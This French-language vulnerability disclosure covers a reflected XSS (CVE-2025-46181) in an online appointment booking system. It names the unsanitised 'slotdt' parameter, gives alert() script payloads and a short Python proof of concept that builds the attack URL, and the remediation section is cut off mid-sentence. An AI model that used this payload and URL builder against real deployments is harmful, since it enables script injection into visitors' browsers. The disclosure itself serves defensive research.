
Divulgation de vulnérabilité XSS réfléchie avec script PoC et guide de remédiation pour un système de réservation de rendez-vous en ligne. Comprend l'analyse des paramètres vulnérables et l'évaluation de l'impact.
CVE-ID : CVE-2025-46181
Découvert par : Shemkumar P (shemkumar.github.io)
Type de vulnérabilité : Cross-Site Scripting Réfléchi (XSS)
Gravité : Moyenne
Statut : Divulgué, CVE attribué par MITRE
Une vulnérabilité de Cross-Site Scripting réfléchi (XSS) existe dans un système public de réservation de rendez-vous en ligne (v1.0), en particulier dans la page qui gère la confirmation de rendez-vous. Un paramètre GET ne parvient pas à assainir correctement les entrées, permettant l'injection de JavaScript et l'exécution de code dans le navigateur de la victime.
GET /confirmapp.php?slotdt=<payload>
Exemple de Charge Utile (Encodée) :
<script>alert("XSS")</script>
<script>alert("You have been hijacked")</script>
🚫 Lien en direct expurgé pour des raisons éthiques. Cette vulnérabilité a été testée dans un environnement contrôlé.
import requests
from urllib.parse import quote
base_url = "https://[REDACTED]/confirmapp.php"
payload = '<script>alert("XSS triggered")</script>'
params = {
'fullname': 'test',
'mobile': '9999999999',
'emailid': '[email protected]',
'slotdt': payload,
'slottime': '11:00:00',
'doctorid': '2'
}
encoded = '&'.join(f"{k}={quote(str(v))}" for k, v in params.items())
print("Test URL (use only in authorized test environments):")
print(f"{base_url}?{encoded}")
L'application devrait :
htmlspecialchars() en PHPShemkumar P
🕸️ shemkumar.github.io
🔐 Chercheur en cybersécurité | Passionné de CTF | Reporter de CVE
⚠️ Cette publication est uniquement destinée à un usage éducatif et défensif. Tester ou exploiter des vulnérabilités sur des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation explicite est illégal et contraire à l'éthique.